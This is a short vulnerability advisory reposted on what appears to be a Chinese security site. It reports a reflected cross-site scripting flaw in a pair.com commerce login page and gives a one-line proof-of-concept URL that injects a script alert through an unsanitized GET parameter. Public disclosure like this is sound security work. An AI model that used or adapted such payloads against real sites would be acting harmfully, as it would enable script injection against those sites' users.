首页
|
安全文章
|
安全工具
|
Exploits
|
本站原创
|
关于我们
|
网站地图
|
安全论坛
当前位置:
主页
>
安全文章
>
文章资料
>
Exploits
>文章内容
commerce35.pair.com suffers from a cross site scripting vulnerability
来源:supermaxnyc[at]gmail.com 作者:Dietz 发布时间:2009-03-11
Author: Max Dietz
Description: After logging in, the message displayed to the user is stored
in a GET request, on which no sanitizing is done
PoC:
https://commerce35.pair.com/inres/notify/index.php?action=loginform&p_status=<script>javascript:alert("HELLO");</script
>
[
推荐
] [
评论(0条)
]
[返回顶部]
[打印本页]
[关闭窗口]
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
§最新评论:
热点文章
·
CVE-2012-0217 Intel sysret exp
·
Linux Kernel 2.6.32 Local Root
·
Array Networks vxAG / xAPV Pri
·
Novell NetIQ Privileged User M
·
Array Networks vAPV / vxAG Cod
·
Excel SLYK Format Parsing Buff
·
PhpInclude.Worm - PHP Scripts
·
Apache 2.2.0 - 2.2.11 Remote e
·
VideoScript 3.0 <= 4.0.1.50 Of
·
Yahoo! Messenger Webcam 8.1 Ac
·
Family Connections <= 1.8.2 Re
·
Joomla Component EasyBook 1.1
相关文章
·
GuildFTPd FTP Server 0.999.14
·
>Foxit Reader 3.0 (<= Build 13
·
RoomPHPlanning <= 1.6 (userfor
·
Traidnt up 2.0 (Cookie) Add Ex
·
RainbowPlayer 0.91 (playlist)
·
POP Peeper 3.4.0.0 Date Remote
·
JDKChat 1.5 Remote Integer Ove
·
VUPlayer <= 2.49 .cue File Uni
·
GeoVision LiveAudio ActiveX Re
·
Internet Explorer 7 DoS Exploi
·
Morovia Barcode ActiveX 3.6.2
·
Internet Explorer 7 DoS Exploi
推荐广告
CopyRight © 2002-2022
VFocuS.Net
All Rights Reserved